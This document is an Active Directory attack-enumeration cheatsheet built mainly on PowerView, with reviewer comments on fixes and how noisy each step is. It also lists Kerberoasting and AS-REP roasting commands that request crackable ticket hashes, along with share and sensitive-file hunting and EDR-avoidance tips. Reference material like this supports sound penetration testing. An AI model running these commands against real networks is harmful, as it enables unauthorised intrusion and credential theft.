Neko

Active Directory Enum

Mostly a PowerView (dev branch) cheatsheet; a few Impacket / Rubeus equivalents are included where they are the usual tooling.

Last updated: May 4th, 2023

Automated

Bloodhound

# SharpHound collector (SharpHound.ps1 must be loaded first). "All" also does
# session and local-group enumeration against every reachable host, so it is
# loud on the wire and commonly alerted on by EDR/SIEM.
Invoke-BloodHound -CollectionMethod All
# Same, but skip the domain controllers for the per-host (session/local group)
# collection, where monitoring is usually tightest.
# NOTE(review): the switch name depends on the collector version - legacy
# builds use -ExcludeDC, newer ones -ExcludeDomainControllers; confirm with Get-Help.
Invoke-BloodHound -CollectionMethod All -ExcludeDC

Manual

Powerview

Domain Enum

#Current Domain - name, parent/forest membership and the list of DCs
Get-Domain | Select-Object Name,Parent,Forest,DomainControllers | Format-List
#Domain SID (needed later for golden/silver tickets and cross-domain SID history checks)
Get-DomainSID

#Domain Policy - the [System Access] section of the default domain GPO
#(password length/age/history and lockout settings; read this before any
# password spraying so you do not lock accounts)
(Get-DomainPolicyData).systemaccess

#Domain Controllers
Get-DomainController | Select-Object Name,OSversion,IPAddress | Format-List

Trusts

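#Domain Trusts
# (fixed: the property list is comma separated - "SourceName.TrustAttributes"
#  silently selected a non-existent property and dropped both columns)
Get-DomainTrust | select SourceName,TrustAttributes,TargetName,TrustDirection

#Forest Enum
#Current Forest
Get-Forest | select Name,SchemaRoleOwner,RootDomainSid | fl

#Forest Domains
Get-ForestDomain | select Name,PdcRoleOwner

#Forest Global Catalog
# (cmdlet is spelled Get-ForestGlobalCatalog in PowerView)
Get-ForestGlobalCatalog | select Name,Domain,IPAddress,OSVersion,Forest

#Forest Trusts
#Current Trusts
Get-ForestTrust

#External Forest Trusts
# TrustAttributes is a flags value (e.g. "FILTER_SIDS, FOREST_TRANSITIVE"), so an
# exact -eq "FILTER_SIDS" only matches trusts with that single flag; -match catches
# every trust that has SID filtering enabled.
Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name} | ?{$_.TrustAttributes -match "FILTER_SIDS"}

#Enum Domain External Trusts
Get-DomainTrust | ?{$_.TrustAttributes -match "FILTER_SIDS"}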

Computer Enum

#Current Domain Computers (LDAP only - quiet; logoncount of 0 usually means a
# stale object, description often leaks role/owner information)
Get-DomainComputer | Select-Object name,logoncount,description,operatingsystem

#Server - wildcard filter is applied server-side in the LDAP query
Get-DomainComputer -OperatingSystem "*Server*"

#Pingable Computers - NOTE: -Ping sends ICMP to every computer object in the
# domain, which is noisy and slow; prefer the LDAP-only query above when stealth matters
Get-DomainComputer -Ping | Select-Object name,logoncount,description,operatingsystem

LoggedOn Users

#Current Local Logged on Users
# (NetWkstaUserEnum against the local box)
Get-NetLoggedon | select username

#Current Computer Logged on Users
# NOTE(review): remote NetWkstaUserEnum generally needs local admin on the
# target on current Windows builds - an access-denied here is expected for a
# plain domain user, not a sign the host is down.
Get-NetLoggedon -ComputerName {HOST}

#Last Login for a Domain Computer
# (reads the remote registry - also requires admin on the target and the
#  Remote Registry service to be running)
Get-LastLoggedOn -ComputerName {HOST}

User Enum

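#Current Domain Users
# useraccountcontrol flags of interest: DONT_REQ_PREAUTH (AS-REP roast),
# PASSWD_NOTREQD, ACCOUNTDISABLE, TRUSTED_FOR_DELEGATION
Get-DomainUser | select name,logoncount,description,memberof,useraccountcontrol
#User Full Details
# (fixed: the parameter is -Identity, not -Identify)
Get-DomainUser -Identity {USER} -Properties *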

Group Enum

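#Domain Groups
#Current Domain Groups
Get-DomainGroup | select Name

#Domain Groups Contains "Admin"
Get-DomainGroup *admin* | select name,Description

#Domain Group members
# (fixed: the parameter is -Identity, not -Identify)
Get-DomainGroupMember -Identity "Domain Admins" | select MemberName,MemberObjectClass,MemberSID
# Same, but expand nested groups - the direct member list alone hides users that
# are admins through group-in-group membership
Get-DomainGroupMember -Identity "Domain Admins" -Recurse | select MemberName,MemberObjectClass,MemberSID

#Local Groups
#Local Groups for Computer
Get-NetLocalGroup -ComputerName {HOST}

#Local Group Members (local box)
Get-NetLocalGroupMember -GroupName Administrators

#Other Computer's Group Members
# (remote SAM enumeration - restricted to admins by default on Windows 10 /
#  Server 2016+, so expect access denied as a plain user)
Get-NetLocalGroupMember -ComputerName {HOST} -GroupName Administrators | select MemberName,IsGroup,IsDomain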

Group Policy

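#Domain GPOs
Get-DomainGPO | select displayname,name

#Domain GPOs for Computer
Get-DomainGPO -ComputerIdentity {HOST} | select displayname,name

#Local Group Users GPO
# Which GPOs grant local-group (e.g. Administrators) membership on a host /
# where a user gets local-group membership via GPO (Restricted Groups / GPP)
# (fixed: -ComputerIdentity was missing its argument)
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity {HOST}
Get-DomainGPOUserLocalGroupMapping -Identity {USER}

#GPO applied on specific OU
# The identity is the GPO GUID (including the braces) taken from the OU's
# gplink attribute - see (Get-DomainOU -Identity {OU}).gplink
Get-DomainGPO -Identity "{GPO_GUID}"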

Organizational Units (OUs)

#Current Domain OUs (gplink shows which GPOs are linked to each OU)
Get-DomainOU | Select-Object name,gplink

#Computers on Specific OU - use the OU's DN as the LDAP search base
(Get-DomainOU -Identity {OU}).distinguishedname | ForEach-Object { Get-DomainComputer -SearchBase $_ } | Select-Object name

Access Control Lists (ACL)

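#ACLs for Object
# (fixed: Get-DomainObjectAcl takes -Identity; -SamAccountName belonged to the
#  old Get-ObjectAcl. -ResolveGUIDs turns extended-right GUIDs into names such
#  as DS-Replication-Get-Changes)
Get-DomainObjectAcl -Identity {USER} -ResolveGUIDs

#ACLS for Prefix or Group
Get-DomainObjectAcl -SearchBase "LDAP://CN=Domain Admins,CN=Users,DC=example,DC=domain,DC=com" -ResolveGUIDs | select ObjectDN,AceType,ActiveDirectoryRights

#Interesting ACLs
# Rights held by non-default principals (GenericAll/GenericWrite/WriteDacl/
# WriteOwner/...). Large domains: expect this to take a while.
Find-InterestingDomainAcl -ResolveGUIDs | select IdentityReferenceName,AceType,ActiveDirectoryRights -Unique

#Path's ACL
# Write access on SYSVOL/NETLOGON means you can tamper with GPO/logon scripts
Get-PathAcl -Path "\\{HOST}.{full.domain}\sysvol"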

Other

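#Share Enum
# Both touch every host in the domain over SMB - noisy; -CheckShareAccess
# additionally tries to open each share as the current user
Invoke-ShareFinder
Invoke-ShareFinder -CheckShareAccess

#Sensitive Files
# Crawls shares for names like *pass*, *cred*, *.config; also very noisy
Invoke-FileFinder

#Domain File Servers
# (derived from users' homeDirectory/scriptPath/profilePath attributes - LDAP only, quiet)
Get-NetFileServer

#Local Admin Access
# Each of these tries to authenticate to every machine in the domain, which
# lights up logon events everywhere; scope with -ComputerName / a target list
# when you can.
Find-LocalAdminAccess -Verbose
# The WMI and PSRemoting variants are standalone scripts, not PowerView
# functions: dot-source the file, then call the function of the same name
# (fixed: the original listed the .ps1 file names as if they were commands)
. .\Find-WMILocalAdminAccess.ps1
Find-WMILocalAdminAccess
. .\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess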

Kerberoasting

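#Find SPNs
# (fixed: the attribute is serviceprincipalname - the misspelling made
#  select return an empty column and the SPNs were never shown)
Get-DomainUser -SPN | select samaccountname,serviceprincipalname
# Request TGS tickets for every user SPN from Linux. Passing the password on
# the command line leaves it in shell history / process lists; prefer -hashes
# or -k with a ccache where possible.
impacket-GetUserSPNs -request -dc-ip {IP} {full.domain}/{USER}:{PASS}
# Count roastable accounts and their encryption types without requesting
# tickets (RC4 tickets crack far faster than AES)
rubeus.exe kerberoast /stats

#Check for SPNs
Get-DomainUser -Identity {USER} | select serviceprincipalname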

Kerberos Delegation

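#Unconstrained
# Unconstrained delegation is the TRUSTED_FOR_DELEGATION flag in
# useraccountcontrol; such hosts have no msds-allowedtodelegateto list, so
# that column was always empty here (fixed).
Get-DomainComputer -Unconstrained | select name,logoncount,useraccountcontrol | fl

#Constrained
#User Enum
Get-DomainUser -TrustedToAuth | select samaccountname,logoncount,msds-allowedtodelegateto | fl

#Computers Enum
Get-DomainComputer -TrustedToAuth | select name,logoncount,description,operatingsystem,msds-allowedtodelegateto | fl

#Resource-Based
# Computers that already have an RBCD descriptor set (raw security descriptor
# in msDS-AllowedToActOnBehalfOfOtherIdentity)
Get-DomainComputer | ?{$_.'msds-allowedtoactonbehalfofotheridentity'} | select name,'msds-allowedtoactonbehalfofotheridentity'
# Objects the user can write to - GenericWrite/GenericAll/WriteDacl on a
# computer object is enough to configure RBCD on it
Find-InterestingDomainACL | ?{$_.identityreferencename -match '{USER}'}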

ASREPRoast

# Accounts with DONT_REQ_PREAUTH set - their AS-REP is encrypted with the
# account's password hash and can be cracked offline
Get-DomainUser -PreauthNotRequired -Verbose
# Same from Linux, requesting the AS-REPs. The credentials are only needed to
# query LDAP for the candidate list; -usersfile works without them. Avoid
# putting the password on the command line (history / ps) where possible.
impacket-GetNPUsers -request -dc-ip {IP} {full.domain}/{USER}:{PASS}

#ASREPRoast.ps1
# (standalone script - dot-source it before calling)
invoke-ASREPRoast -Verbose

More coming soon.